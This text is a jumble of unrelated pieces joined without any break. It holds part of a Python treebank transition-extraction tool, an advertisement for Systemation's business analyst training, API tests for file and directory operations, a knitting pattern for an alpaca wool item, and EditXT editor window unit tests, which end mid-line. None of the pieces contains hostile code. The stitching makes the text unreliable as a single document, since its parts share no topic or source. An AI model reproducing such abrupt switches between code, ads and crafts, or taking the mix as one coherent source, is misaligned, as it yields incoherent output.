return terminals, transitions def add_parser(subparsers): """Add an argument parser to the subparsers of treetools.py. """ parser = subparsers.add_parser('transitions', usage='%(prog)s src dest ' 'transtype [options] ', formatter_class=argparse. 
RawDescriptionHelpFormatter, description='transition extraction from' ' treebank trees') parser.add_argument('src', help='input file') parser.add_argument('dest', help='prefix of output files') parser.add_argument('transtype', metavar='T', choices=[t for t in TRANSTYPES], help='type of transitions (default: %(default)s)', default='topdown') parser.add_argument('--transform', metavar='TS', choices=[fun.__name__ for fun in transform.TRANSFORMATIONS], nargs='+', help='tree transformations to apply before extraction', default=[]) parser.add_argument('--transformparams', metavar='TSP', nargs='+', help='tree transformations parameters', default=[]) parser.add_argument('--src-format', metavar='FMT', choices=[fun.__name__ for fun in treeinput.INPUT_FORMATS], help='input format (default: %(default)s)', default='export') parser.add_argument('--src-enc', metavar='ENCODING', help='input encoding (default: %(default)s)', default='utf-8') parser.add_argument('--src-opts', nargs='+', metavar='O', help='space separated list of options O for reading ' 'input of the form key:value ' '(default: %(default)s)', default=[]) parser.add_argument('--dest-format', metavar='FMT', help='grammar format (default: %(default)s)', default='plain') parser.add_argument('--dest-enc', metavar='ENCODING', help='grammar encoding (default: %(default)s)', default='utf-8') parser.add_argument('--dest-opts', nargs='+', metavar='O', help='space separated list of options O for writing ' 'the transitions of the form key:value ' '(default: %(default)s)', default=[]) parser.add_argument('--verbose', action='store_true', help='More verbose ' 'messages', default=False) parser.add_argument('--usage', nargs=0, help='show detailed information ' 'about available tasks and input format/options', action=UsageAction) parser.set_defaults(func=run) return parser class UsageAction(argparse.Action): """Custom action which shows extended help on available options. """ def __call__(self, parser, namespace, values, option_string=None): title_str = misc.bold("{} help".format(sys.argv[0])) help_str = "\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}".\ format(misc.make_headline("available transition types:"), misc.get_doc_opts(TRANSTYPES), misc.make_headline("available tree input formats:"), misc.get_doc(treeinput.INPUT_FORMATS), misc.make_headline("available tree input opts:"), misc.get_doc_opts(treeinput.INPUT_OPTIONS), misc.make_headline("available output formats:"), misc.get_doc(transitionoutput.FORMATS), misc.make_headline("available output opts:"), misc.get_doc_opts(transitionoutput.FORMAT_OPTIONS)) print("\n%s%s" % (title_str, help_str)) sys.exit() def run(args): """Run the transition extraction. 
""" print("reading from '%s' in format '%s' and encoding '%s'" % (args.src, args.src_format, args.src_enc), file=sys.stderr) tree_inputformats = [fun.__name__ for fun in treeinput.INPUT_FORMATS] transitions = [] if args.src_format in tree_inputformats: print("extracting transitions (%s)" % args.transtype, file=sys.stderr) cnt = 1 for tree in getattr(treeinput, args.src_format)(args.src, args.src_enc, **misc.options_dict (args.src_opts)): for algorithm in args.transform: print(algorithm) tree = getattr(transform, algorithm)( tree, **misc.options_dict(args.transformparams)) sentence, trans = globals()[args.transtype](tree) transitions.append((sentence, trans)) if cnt % 100 == 0: print("\r%d" % cnt, end="", file=sys.stderr) cnt += 1 else: raise ValueError("Specify input format %s" % args.src_format) print("\n", file=sys.stderr) sys.stderr.write("\nwriting transitions in format '%s', encoding '%s', to '%s'" % (args.dest_format, args.dest_enc, args.dest)) sys.stderr.write("\n") getattr(transitionoutput, args.dest_format)(transitions, args.dest, args.dest_enc, **misc.options_dict(args.dest_opts)) print("\n", file=sys.stderr) sys.exit() TRANSTYPES = {'topdown': 'Top-down continuous', 'inorder': 'Inorder continuous', 'gap': 'Gap discontinuous'}
A skilled business analyst contributes to the success of their projects by improving the requirements that project managers will work from. Organizations that assign a business analyst to each project are much more likely to deliver successfully, on time, and under budget. Systemation’s online business analyst training is tailored to fit the schedules of busy professionals and students alike. With our blend of lectures and hands-on exercises, our courses provide participants with an easy-to-access yet advanced training experience. By taking a business analyst online course, and by developing and mastering the techniques it covers, participants will learn how to work with diverse and sometimes separate teams, ask the right questions, and choose the best strategies. Understanding the technological environment, possessing a strong grasp of business requirements, and communicating exceptionally well will give you the edge you need to be a successful business analyst. Our courses teach you how to apply the business analysis techniques you learn to real-world situations. We will help you learn how to document business needs in detail, and we will prepare you to present requirements and recommend business process changes to management. Our Mastering the Requirements Process online course will help you learn how to capture stakeholder requests, write quality requirements statements, ask the right questions, and model existing systems. Systemation also offers a CBAP® exam preparation course designed to help participants learn best practices for preparing for and passing the exam. It focuses on the central concepts of the Business Analysis Body of Knowledge (BABOK®) version 2.0 so that participants can prepare effectively. With a Systemation business analyst online course, you will be the hero of your next project and beyond. Contact us today and learn what we can provide for you and your future.
#coding: UTF-8 """ Test file/dir operations. """ import posixpath import pytest import urllib from urllib import urlencode, quote import urlparse from tests.common.utils import randstring, urljoin from tests.api.apitestbase import ApiTestBase class FilesApiTest(ApiTestBase): def test_rename_file(self): with self.get_tmp_repo() as repo: name, furl = self.create_file(repo) data = { 'operation': 'rename', 'newname': name + randstring(), } res = self.post(furl, data=data) self.assertRegexpMatches(res.text, r'"http(.*)"') def test_remove_file(self): with self.get_tmp_repo() as repo: _, furl = self.create_file(repo) res = self.delete(furl) self.assertEqual(res.text, '"success"') def test_move_file(self): with self.get_tmp_repo() as repo: _, furl = self.create_file(repo) # TODO: create another repo here, and use it as dst_repo data = { 'operation': 'move', 'dst_repo': repo.repo_id, 'dst_dir': '/', } res = self.post(furl, data=data) self.assertEqual(res.text, '"success"') def test_copy_file(self): with self.get_tmp_repo() as repo: # TODO: create another repo here, and use it as dst_repo # create sub folder(dpath) dpath, _ = self.create_dir(repo) # create tmp file in sub folder(dpath) tmp_file = 'tmp_file.txt' file_path = dpath + '/' + tmp_file furl = repo.get_filepath_url(file_path) data = {'operation': 'create'} res = self.post(furl, data=data, expected=201) # copy tmp file from sub folder(dpath) to dst dir('/') data = { 'dst_repo': repo.repo_id, 'dst_dir': '/', 'operation': 'copy', } u = urlparse.urlparse(furl) parsed_furl = urlparse.urlunparse((u.scheme, u.netloc, u.path, '', '', '')) res = self.post(parsed_furl+ '?p=' + quote(file_path), data=data) self.assertEqual(res.text, '"success"') # get info of copied file in dst dir('/') fdurl = repo.file_url + u'detail/?p=/%s' % quote(tmp_file) detail = self.get(fdurl).json() self.assertIsNotNone(detail) self.assertIsNotNone(detail['id']) def test_download_file(self): with self.get_tmp_repo() as repo: fname, furl = self.create_file(repo) res = self.get(furl) self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname)) def test_download_file_without_reuse_token(self): with self.get_tmp_repo() as repo: fname, furl = self.create_file(repo) res = self.get(furl) self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname)) # download for the first time url = urllib.urlopen(res.text.strip('"')) code = url.getcode() self.assertEqual(code, 200) # download for the second time url = urllib.urlopen(res.text.strip('"')) code = url.getcode() self.assertEqual(code, 400) def test_download_file_with_reuse_token(self): with self.get_tmp_repo() as repo: fname, furl = self.create_file(repo) res = self.get(furl + '&reuse=1') self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname)) # download for the first time url = urllib.urlopen(res.text.strip('"')) code = url.getcode() self.assertEqual(code, 200) # download for the second time url = urllib.urlopen(res.text.strip('"')) code = url.getcode() self.assertEqual(code, 200) def test_download_file_from_history(self): with self.get_tmp_repo() as repo: fname, _ = self.create_file(repo) file_history_url = urljoin(repo.repo_url, 'history/') + \ '?p=/%s' % quote(fname) res = self.get(file_history_url).json() commit_id = res['commits'][0]['id'] self.assertEqual(len(commit_id), 40) data = { 'p': fname, 'commit_id': commit_id, } query = '?' 
+ urlencode(data) res = self.get(repo.file_url + query) self.assertRegexpMatches(res.text, r'"http(.*)/%s"' % quote(fname)) def test_get_file_detail(self): with self.get_tmp_repo() as repo: fname, _ = self.create_file(repo) fdurl = repo.file_url + u'detail/?p=/%s' % quote(fname) detail = self.get(fdurl).json() self.assertIsNotNone(detail) self.assertIsNotNone(detail['id']) self.assertIsNotNone(detail['mtime']) self.assertIsNotNone(detail['type']) self.assertIsNotNone(detail['name']) self.assertIsNotNone(detail['size']) def test_get_file_history(self): with self.get_tmp_repo() as repo: fname, _ = self.create_file(repo) fhurl = repo.file_url + u'history/?p=%s' % quote(fname) history = self.get(fhurl).json() for commit in history['commits']: self.assertIsNotNone(commit['rev_file_size']) #self.assertIsNotNone(commit['rev_file_id']) #allow null self.assertIsNotNone(commit['ctime']) self.assertIsNotNone(commit['creator_name']) self.assertIsNotNone(commit['creator']) self.assertIsNotNone(commit['root_id']) #self.assertIsNotNone(commit['rev_renamed_old_path']) #allow null #self.assertIsNotNone(commit['parent_id']) #allow null self.assertIsNotNone(commit['new_merge']) self.assertIsNotNone(commit['repo_id']) self.assertIsNotNone(commit['desc']) self.assertIsNotNone(commit['id']) self.assertIsNotNone(commit['conflict']) #self.assertIsNotNone(commit['second_parent_id']) #allow null def test_get_upload_link(self): with self.get_tmp_repo() as repo: upload_url = urljoin(repo.repo_url, 'upload-link') res = self.get(upload_url) self.assertRegexpMatches(res.text, r'"http(.*)/upload-api/[^/]+"') def test_get_update_link(self): with self.get_tmp_repo() as repo: update_url = urljoin(repo.repo_url, 'update-link') res = self.get(update_url) self.assertRegexpMatches(res.text, r'"http(.*)/update-api/[^/]+"') # def test_upload_file(self): # # XXX: requests has problems when post a file whose name contains # # non-ascii data # fname = 'file-upload-test %s.txt' % randstring() # furl = self.test_file_url + '?p=/%s' % quote(fname) # self.delete(furl) # upload_url = self.test_repo_url + u'upload-link/' # res = self.get(upload_url) # upload_api_url = re.match(r'"(.*)"', res.text).group(1) # files = { # 'file': (fname, 'Some lines in this file'), # 'parent_dir': '/', # } # res = self.post(upload_api_url, files=files) # self.assertRegexpMatches(res.text, r'\w{40,40}') # def test_update_file(self): # fname = 'file-update-test %s.txt' % randstring() # _, furl = self.create_file(fname=fname) # update_url = self.test_repo_url + u'update-link/' # res = self.get(update_url) # update_api_url = re.match(r'"(.*)"', res.text).group(1) # files = { # 'file': ('filename', 'Updated content of this file'), # 'target_file': '/test_update.c' # } # res = self.post(update_api_url, files=files) # self.assertRegexpMatches(res.text, r'\w{40,40}') def test_get_upload_blocks_link(self): with self.get_tmp_repo() as repo: upload_blks_url = urljoin(repo.repo_url, 'upload-blks-link') res = self.get(upload_blks_url) self.assertRegexpMatches(res.text, r'"http(.*)/upload-blks-api/[^/]+"') def test_get_update_blocks_link(self): with self.get_tmp_repo() as repo: update_blks_url = urljoin(repo.repo_url, 'update-blks-link') res = self.get(update_blks_url) self.assertRegexpMatches(res.text, r'"http(.*)/update-blks-api/[^/]+"') def test_only_list_dir(self): with self.get_tmp_repo() as repo: self.create_file(repo) self.create_dir(repo) dirents = self.get(repo.dir_url + '?t=d').json() self.assertHasLen(dirents, 1) for dirent in dirents: 
self.assertIsNotNone(dirent['id']) self.assertIsNotNone(dirent['name']) self.assertEqual(dirent['type'], 'dir') def test_only_list_file(self): with self.get_tmp_repo() as repo: self.create_file(repo) self.create_dir(repo) dirents = self.get(repo.dir_url + '?t=f').json() self.assertHasLen(dirents, 1) for dirent in dirents: self.assertIsNotNone(dirent['id']) self.assertIsNotNone(dirent['name']) self.assertIsNotNone(dirent['size']) self.assertEqual(dirent['type'], 'file') def test_list_dir_and_file(self): with self.get_tmp_repo() as repo: self.create_file(repo) self.create_dir(repo) dirents = self.get(repo.dir_url).json() self.assertHasLen(dirents, 2) for dirent in dirents: self.assertIsNotNone(dirent['id']) self.assertIsNotNone(dirent['name']) self.assertIn(dirent['type'], ('file', 'dir')) if dirent['type'] == 'file': self.assertIsNotNone(dirent['size']) def test_list_recursive_dir(self): with self.get_tmp_repo() as repo: # create test dir data = {'operation': 'mkdir'} dir_list = ['/1/', '/1/2/', '/1/2/3/', '/4/', '/4/5/', '/6/'] for dpath in dir_list: durl = repo.get_dirpath_url(dpath) self.post(durl, data=data, expected=201) # get recursive dir dirents = self.get(repo.dir_url + '?t=d&recursive=1').json() self.assertHasLen(dirents, len(dir_list)) for dirent in dirents: self.assertIsNotNone(dirent['id']) self.assertEqual(dirent['type'], 'dir') full_path = posixpath.join(dirent['parent_dir'], dirent['name']) + '/' self.assertIn(full_path, dir_list) def test_remove_dir(self): with self.get_tmp_repo() as repo: _, durl = self.create_dir(repo) res = self.delete(durl) self.assertEqual(res.text, u'"success"') self.get(durl, expected=404) def test_download_dir(self): with self.get_tmp_repo() as repo: dpath, _ = self.create_dir(repo) query = '?p=%s' % quote(dpath) ddurl = urljoin(repo.dir_url, 'download') + query res = self.get(ddurl) self.assertRegexpMatches(res.text, r'"http(.*)/files/[^/]+/%s"' % quote(dpath[1:])) @pytest.mark.xfail def test_create_dir_with_parents(self): with self.get_tmp_repo() as repo: path = u'/level1/level 2/level_3/目录4' self.create_dir_with_parents(repo, path) def create_dir_with_parents(self, repo, path): data = {'operation': 'mkdir', 'create_parents': 'true'} durl = repo.get_dirpath_url(path.encode('utf-8')) self.post(durl, data=data, expected=201) curpath = '' # check the parents are created along the way parts = path.split('/') for i, name in enumerate(parts): curpath += '/' + name url = repo.get_dirpath_url(curpath.encode('utf-8')) if i < len(parts) - 1: assert self.get(url).json()[0]['name'] == parts[i+1] else: assert self.get(url).json() == []
Materials: 2 x 100g balls of DK Homefield Alpaca Wool, 4.5mm needles, darning needle. Tension: Knit a tension square to check measurements and alter if necessary. Method: P = purl, K = knit, T2 (Twist 2) = knit into the back of the 2nd stitch, then into the front of the 1st stitch. Row 1: P2, K2, all along the row. Row 2: K2, P2, all along the row. Row 3: P2, T2, all along the row. Cast off, leaving sufficient yarn to sew up; then, with right sides together, sew the ends together using your darning needle and yarn.
# -*- coding: utf-8 -*- # EditXT # Copyright 2007-2013 Daniel Miller <[email protected]> # # This file is part of EditXT, a programmer's text editor for Mac OS X, # which can be found at http://editxt.org/. # # EditXT is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # EditXT is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with EditXT. If not, see <http://www.gnu.org/licenses/>. import logging import os import re from collections import defaultdict from functools import partial import AppKit as ak import Foundation as fn from mocker import Mocker, ANY from testil import eq_ import editxt.constants as const from editxt.window import WindowController, Window from editxt.document import DocumentController, TextDocument from editxt.editor import Editor from editxt.platform.kvo import proxy_target from editxt.project import Project from editxt.test.noseplugins import slow_skip from editxt.util import representedObject from editxt.test.util import (do_method_pass_through, gentest, make_dirty, TestConfig, Regex, replattr, tempdir, test_app) import editxt.window as mod log = logging.getLogger(__name__) # log.debug("""TODO test # Window.iter_dropped_paths # Window.iter_dropped_id_list # """) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Window tests # log.debug("""TODO implement # """) def test_WindowConroller__init__(): @test_app def test(app, args): ed = Window(app, **args) assert len(ed.projects) == 0 assert len(ed.recent) == 0 assert ed.wc is not None if args: assert ed.state is args["state"] eq_(ed.command.window, ed) c = TestConfig() yield test, {} yield test, {"state": "<state data>"} def test_window_did_load(): @test_app def test(app, state): import editxt.platform.views as cells from editxt.window import BUTTON_STATE_SELECTED from editxt.util import load_image m = Mocker() ed = Window(app, state) wc = ed.wc = m.mock(WindowController) _setstate = m.method(ed._setstate) new_project = m.method(ed.new_project) load_image_cache = {} _load_image = m.mock() def load_image(name): try: img = load_image_cache[name] _load_image(name) except KeyError: img = load_image_cache[name] = m.mock() _load_image(name) >> img return img wc.docsView.setRefusesFirstResponder_(True) wc.docsView.default_menu = ed.menu wc.docsView.registerForDraggedTypes_( [const.DOC_ID_LIST_PBOARD_TYPE, ak.NSFilenamesPboardType]) wc.plusButton.setRefusesFirstResponder_(True) wc.plusButton.setImage_(load_image(const.PLUS_BUTTON_IMAGE)) wc.propsViewButton.setRefusesFirstResponder_(True) wc.propsViewButton.setImage_(load_image(const.PROPS_DOWN_BUTTON_IMAGE)) wc.propsViewButton.setAlternateImage_(load_image(const.PROPS_UP_BUTTON_IMAGE)) _setstate(state) if state: ed.projects = [m.mock(Project)] else: new_project() with replattr(mod, 'load_image', load_image), m: ed.window_did_load() eq_(len(ed.projects), (1 if state else 0)) assert ed._state is None #assert ed.window_settings == "<settings>" yield test, None yield test, "<serial data>" def test__setstate(): from itertools import count from editxt.util import RecentItemStack keygen = count() class Item(dict): def 
__init__(self, **kwargs): self["id"] = next(keygen) self.update(kwargs) @property def proxy(self): return self @property def _target(self): return self def __getattr__(self, name): try: return self[name] except KeyError: raise AttributeError(name) @test_app def test(app, data): m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) ed.suspend_recent_updates = m.method(ed.suspend_recent_updates) project_class = m.replace(mod, 'Project') ed.recent = m.mock(RecentItemStack) ws = m.property(ed, 'window_settings') projects = [] if data: for serial in data.get("projects", data.get("project_serials", [])): proj = project_class(ed, serial=serial) >> Item() projects.append(proj) for pi, di in data.get("recent_items", []): if pi < 1: while len(ed.projects) <= pi: docs = [] proj = Item(editors=docs) projects.append(proj) ed.projects.append(proj) proj = ed.projects[pi] if di == "<project>": ed.recent.push(proj.id) else: if di < 2: while len(proj.editors) <= di: proj.editors.append(Item()) ed.recent.push(docs[di].id) @mod.contextmanager def focus(): yield ed.suspend_recent_updates() >> focus() if 'window_settings' in data: ws.value = data['window_settings'] with m: ed._setstate(data) eq_(list(ed.projects), projects) yield test, None yield test, dict() yield test, dict(projects=["<serial>"]) yield test, dict(project_serials=["<serial>"]) # legacy yield test, dict(recent_items=[[0, 2], [0, 0], [0, "<project>"], [0, 1], [1, 0]]) yield test, dict(window_settings="<window_settings>") def test_state(): @test_app def test(app, c): m = Mocker() def exists(path): return True ed = Window(app) ed.projects = projs = [] ed.recent = c.recent m.property(ed, 'window_settings').value >> '<settings>' psets = [] items = {} for i, p in enumerate(c.projs): proj = m.mock(Project) projs.append(proj) pserial = proj.serialize() >> ("proj_%i" % p.id) psets.append(pserial) # setup for recent items proj.id >> p.id items[p.id] = [i, "<project>"] docs = proj.editors >> [] for j, d in enumerate(p.docs): editor = m.mock(Editor) docs.append(editor) editor.id >> d items[d] = [i, j] rits = [items[ri] for ri in c.recent if ri in items] data = {'window_settings': '<settings>'} if psets: data["projects"] = psets if rits: data["recent_items"] = rits with replattr(os.path, 'exists', exists), m: eq_(ed.state, data) c = TestConfig(window='<settings>') p = lambda ident, docs=(), **kw:TestConfig(id=ident, docs=docs, **kw) yield test, c(projs=[], recent=[]) yield test, c(projs=[p(42)], recent=[42]) yield test, c(projs=[p(42, docs=[35])], recent=[35, 42]) yield test, c(projs=[p(42, docs=[-32, 35])], recent=[35, 42]) def test_discard(): from editxt.util import RecentItemStack @test_app def test(app, c): m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) (ed.wc.selected_items << []).count(2) ed.projects = projs = [] ed.recent = m.mock(RecentItemStack) app = m.replace(ed, 'app') new_current_editor = None cv = m.property(ed, "current_editor") @mod.contextmanager def suspend(): yield m.method(ed.suspend_recent_updates)(True) >> suspend() lookup = {} for p in c.hier: proj = m.mock(Project) proj.id >> p.id docs = [] for d in p.docs: dv = m.mock(Editor) dv.id >> d.id docs.append(dv) if c.id in (p.id, d.id): ed.recent.discard(d.id) dv.project >> proj dv.close() else: lookup[d.id] = dv proj.editors >> docs if p.id == c.id: ed.recent.discard(p.id) proj.close() else: lookup[p.id] = proj projs.append(proj) item = m.mock() item.id >> c.id with m: ed.discard(item) item = lambda i, **kw: TestConfig(id=i, **kw) c = TestConfig(id=2, recent=[], 
hier=[ # hierarchy of items in the window item(0, docs=[item(1), item(2), item(3)]), item(4, docs=[item(5), item(6), item(7)]), item(8, docs=[item(9), item(12), item(13)]), ]) yield test, c(id=42, hier=[]) yield test, c(id=42) yield test, c yield test, c(recent=[0, 10]) yield test, c(recent=[10, 0]) yield test, c(recent=[20, 2]) yield test, c(recent=[2, 20]) yield test, c(id=0, recent=[0, 10, 2, 1, 3, 5, 7]) def test_get_current_editor(): with test_app() as app: ed = Window(app) obj = object() ed._current_editor = obj eq_(ed.current_editor, obj) def test_set_current_editor(): from editxt.util import RecentItemStack @test_app def test(app, c): m = Mocker() window = Window(app) wc = window.wc = m.mock(WindowController) insert_items = m.method(window.insert_items) window.recent = m.mock(RecentItemStack) find_project_with_editor = m.method(window.find_project_with_editor) editor = (None if c.editor_class is None else m.mock(c.editor_class)) if c.editor_class is None: assert editor is None, editor wc.setup_current_editor(None) wc.selected_items = [] else: wc.is_current_view(editor.main_view >> "view") >> c.editor_is_current if c.editor_is_current: editor.focus() else: window.recent.push(editor.id >> m.mock()) setup = c.editor_class is Editor and not c.view_is_main wc.setup_current_editor(editor) >> setup if setup: if c.proj_is_none: find_project_with_editor(editor) >> None insert_items([editor]) else: find_project_with_editor(editor) >> m.mock(Project) wc.selected_items >> [] wc.selected_items = [editor] with m: window.current_editor = editor c = TestConfig(editor_is_current=False, editor_class=Editor) yield test, c(editor_is_current=True) yield test, c(editor_class=None) for is_main in (True, False): for no_project in (True, False): yield test, c(view_is_main=is_main, proj_is_none=no_project) yield test, c(editor_class=Project) yield test, c(editor_class=Project, editor_is_current=True) def test_selected_editor_changed(): @test_app def test(app, c): m = Mocker() ed = Window(app) ed.wc = wc = m.mock(WindowController) cv = m.property(ed, "current_editor") sel = [m.mock() for x in range(c.numsel)] wc.selected_items >> sel if sel: if c.is_current_selected: cv.value >> sel[0] else: cv.value >> m.mock() cv.value = sel[0] with m: ed.selected_editor_changed() c = TestConfig(numsel=0) yield test, c for ics in (True, False): yield test, c(numsel=1, is_current_selected=ics) yield test, c(numsel=5, is_current_selected=ics) def test_on_dirty_status_changed(): calls = [] def callback(editor, dirty): calls.append(dirty) with test_app("editor") as app: window = app.windows[0] editor = window.projects[0].editors[0] with replattr(window.wc, "on_dirty_status_changed", callback, sigcheck=False): eq_(calls, []) make_dirty(editor.document) eq_(calls, [True]) assert window.is_dirty editor.undo_manager.savepoint() eq_(calls, [True, False]) assert not window.is_dirty def test_suspend_recent_updates(): def test(c): with test_app(c.init) as app: window = app.windows[0] editor = window.current_editor real = window.recent assert real is not None with window.suspend_recent_updates(): assert window.recent is not real window.recent.push(editor.id + 42) if c.remove: item = test_app(app).get(c.remove) if isinstance(item, Editor): item.project.editors.remove(item) else: item.window.projects.remove(item) eq_(test_app(app).state, c.final) c = TestConfig(remove=None) yield test, c(init="editor*", final="window project editor*") yield test, c(init="editor(1)* editor(2)", final="window project editor(1)* editor(2)") yield test, 
c(init="editor(1)* editor(2)", remove="editor(1)", final="window project editor(2)*") yield test, c(init="editor(1)* editor(2)", remove="editor(2)", final="window project editor(1)*") yield test, c(init="project(a) editor(1)* project(b) editor(2)", final="window project(b) editor(2)*", remove="project(a)") def test_open_documents(): def test(cfg, prompt, after): with test_app(cfg) as app: window = app.windows[0] window.open_documents() eq_(window.wc.prompts, prompt) eq_(test_app(app).state, "window project" + after) yield test, "window", ["open ~"], "[0] editor[~/file.txt 1]*" yield test, "project*", ["open ~"], " editor[~/file.txt 0]*" yield test, "project* editor", ["open ~"], " editor editor[~/file.txt 0]*" yield test, "project editor*", ["open ~"], " editor editor[~/file.txt 0]*" yield test, "editor(/dir/doc.txt)*", ["open /dir"], " editor(/dir/doc.txt) editor[/dir/file.txt 0]*" yield test, "editor(/cancel/doc.txt)*", ["open /cancel"], " editor(/cancel/doc.txt)*" def test_save_methods(): def test(cfg, save, prompt=False): with test_app(cfg) as app: m = Mocker() window = app.windows[0] current = window.current_editor if save is not None: method = m.method(current.save) if save: method(prompt=prompt) with m: (window.save_as if prompt else window.save)() yield test, "window", None yield test, "project*", False yield test, "project* editor", False yield test, "editor*", True yield test, "editor*", True, True def test_reload_current_document(): def test(cfg, reverted=False): with test_app(cfg) as app: m = Mocker() window = app.windows[0] current = window.current_editor if reverted: m.method(current.document.reload_document)() else: assert getattr(current, "document", None) is None, repr(current) with m: window.reload_current_document() yield test, "window" yield test, "project*" yield test, "project* editor" yield test, "project editor*", True def test_save_document_as(): assert hasattr(Window, "save_document_as") def test_prompt_to_overwrite(): assert hasattr(Window, "prompt_to_overwrite") def test__directory_and_filename(): def test(path, directory, name, mkdir=False): if os.path.isabs(path): path = path.lstrip(os.path.sep) assert not os.path.isabs(path), path with tempdir() as tmp: path = os.path.join(tmp, path) if mkdir: assert not os.path.exists(os.path.dirname(path)), path os.mkdir(os.path.dirname(path)) result = Window._directory_and_filename(path) result = (result[0][len(tmp):] or "/"), result[1] else: result = Window._directory_and_filename(path) eq_(result, (directory, name)) yield test, "file.txt", None, "file.txt" yield test, "/file.txt", "/", "file.txt" yield test, "somedir/file.txt", None, "file.txt" yield test, "/somedir/file.txt", "/", "file.txt" yield test, "/somedir/file.txt", "/somedir", "file.txt", True def test_new_project(): with test_app() as app: m = Mocker() ed = Window(app) m.property(ed, "current_editor").value = ANY m.method(Project.create_editor)() >> m.mock() with m: result = ed.new_project() assert result in ed.projects, ed.projects eq_(list(result.editors), []) eq_(result.window, ed) def test_toggle_properties_pane(): slow_skip() @test_app def test(app, c): m = Mocker() nsanim = m.replace(ak, 'NSViewAnimation') nsdict = m.replace(fn, 'NSDictionary') nsval = m.replace(fn, 'NSValue') nsarr = m.replace(fn, 'NSArray') ed = Window(app) ed.wc = wc = m.mock(WindowController) tree_view = m.mock(ak.NSScrollView); (wc.docsScrollview << tree_view).count(2) prop_view = m.mock(ak.NSView); (wc.propsView << prop_view).count(2, 3) tree_rect = tree_view.frame() >> 
m.mock(fn.NSRect) prop_rect = prop_view.frame() >> m.mock(fn.NSRect) wc.propsViewButton.state() >> (ak.NSOnState if c.is_on else ak.NSOffState) if c.is_on: prop_rect.size.height >> 10 tree_rect.size.height = (tree_rect.size.height >> 20) + 9 tree_rect.origin.y = prop_rect.origin.y >> 4 prop_rect.size.height = 0.0 else: tree_rect.size.height = (tree_rect.size.height >> 216.0) - 115.0 if c.mid_resize: (prop_rect.size.height << 100.0).count(2) tree_rect.size.height = (tree_rect.size.height >> 100.0) + 99.0 else: prop_rect.size.height >> 0 tree_rect.origin.y = (prop_rect.origin.y >> 0) + 115.0 prop_rect.size.height = 116.0 prop_view.setHidden_(False) resize_tree = nsdict.dictionaryWithObjectsAndKeys_( tree_view, ak.NSViewAnimationTargetKey, (nsval.valueWithRect_(tree_rect) >> m.mock()), ak.NSViewAnimationEndFrameKey, None, ) >> m.mock(fn.NSDictionary) resize_props = nsdict.dictionaryWithObjectsAndKeys_( prop_view, ak.NSViewAnimationTargetKey, (nsval.valueWithRect_(prop_rect) >> m.mock()), ak.NSViewAnimationEndFrameKey, None, ) >> m.mock(fn.NSDictionary) anims = nsarr.arrayWithObjects_(resize_tree, resize_props, None) >> m.mock(fn.NSArray) anim = nsanim.alloc() >> m.mock(ak.NSViewAnimation) anim.initWithViewAnimations_(anims) >> anim anim.setDuration_(0.25) anim.startAnimation() with m: ed.toggle_properties_pane() c = TestConfig() yield test, c(is_on=True) yield test, c(is_on=False, mid_resize=True) yield test, c(is_on=False, mid_resize=False) def test_find_project_with_editor(): with test_app() as app: ed = Window(app) doc = app.document_with_path(None) proj = Project(ed) dv = Editor(proj, document=doc) proj.insert_items([dv]) assert dv.document is doc ed.projects.append(proj) eq_(ed.find_project_with_editor(dv), proj) dv = object() eq_(ed.find_project_with_editor(dv), None) def test_find_project_with_path(): @test_app def test(app, c): m = Mocker() def exists(path): return True def samefile(f1, f2): eq_(f2, c.path) return f1 == f2 ed = Window(app) ed.projects = projects = [] found_proj = None for path in c.paths: proj = m.mock(Project) projects.append(proj) if found_proj is None: proj.file_path >> path if path is None: continue if path == c.path: found_proj = proj with replattr( (os.path, 'exists', exists), (os.path, 'samefile', samefile), ), m: result = ed.find_project_with_path(c.path) eq_(result, found_proj) def path(i): return "/path/to/proj_%s.%s" % (i, const.PROJECT_EXT) c = TestConfig(path=path(1), paths=[]) yield test, c yield test, c(paths=[None]) yield test, c(paths=[path(1)]) yield test, c(paths=[path(0), path(1)]) yield test, c(paths=[path(0), path(1), path(2), path(1)]) def test_get_current_project(): def test(cfg, index, create=False, after=None): args = {"create": True} if create else {} with test_app(cfg) as app: window = app.windows[0] result = window.get_current_project(**args) eq_(test_app(app).state, after or cfg) if index is None: eq_(result, None) else: eq_(result, window.projects[index]) yield test, "window", None yield test, "window", 0, True, "window project[0]" yield test, "window project", 0 yield test, "window project* project", 0 yield test, "window project project*", 1 yield test, "window project -project*", 1 yield test, "window project project editor*", 1 yield test, "window project editor project editor", 0 yield test, "window -project editor project editor", 1 def test_Window_iter_editors_of_document(): DOC = "the document we're looking for" @test_app def test(app, config, total_editors): ed = Window(app) m = Mocker() editors = [] doc = m.mock(TextDocument) 
ed.projects = projs = [] for proj_has_editor in config: proj = m.mock(Project) projs.append(proj) dv = (m.mock(Editor) if proj_has_editor else None) proj.iter_editors_of_document(doc) >> ([] if dv is None else [dv]) if dv is not None: editors.append(dv) with m: result = list(ed.iter_editors_of_document(doc)) eq_(result, editors) eq_(len(result), total_editors) yield test, [], 0 yield test, [False], 0 yield test, [True], 1 yield test, [False, True, True, False, True], 3 def test_tool_tip_for_item(): def test(doctype, null_path): m = Mocker() view = m.mock(ak.NSOutlineView) if doctype is not None: tip = "test_tip" doc = m.mock(doctype) (doc.file_path << (None if null_path else tip)).count(1, 2) else: tip = doc = None item = m.mock() view.realItemForOpaqueItem_(item) >> doc with m, test_app() as app: ed = Window(app) result_tip = ed.tooltip_for_item(view, item) eq_(result_tip, (None if null_path else tip)) for doctype in (TextDocument, Project, None): yield test, doctype, True yield test, doctype, False def test_should_edit_item(): @test_app def test(app, c): m = Mocker() ed = Window(app) item = m.mock() col = m.mock(ak.NSTableColumn) if (col.isEditable() >> c.col_is_editable): obj = m.mock(Project if 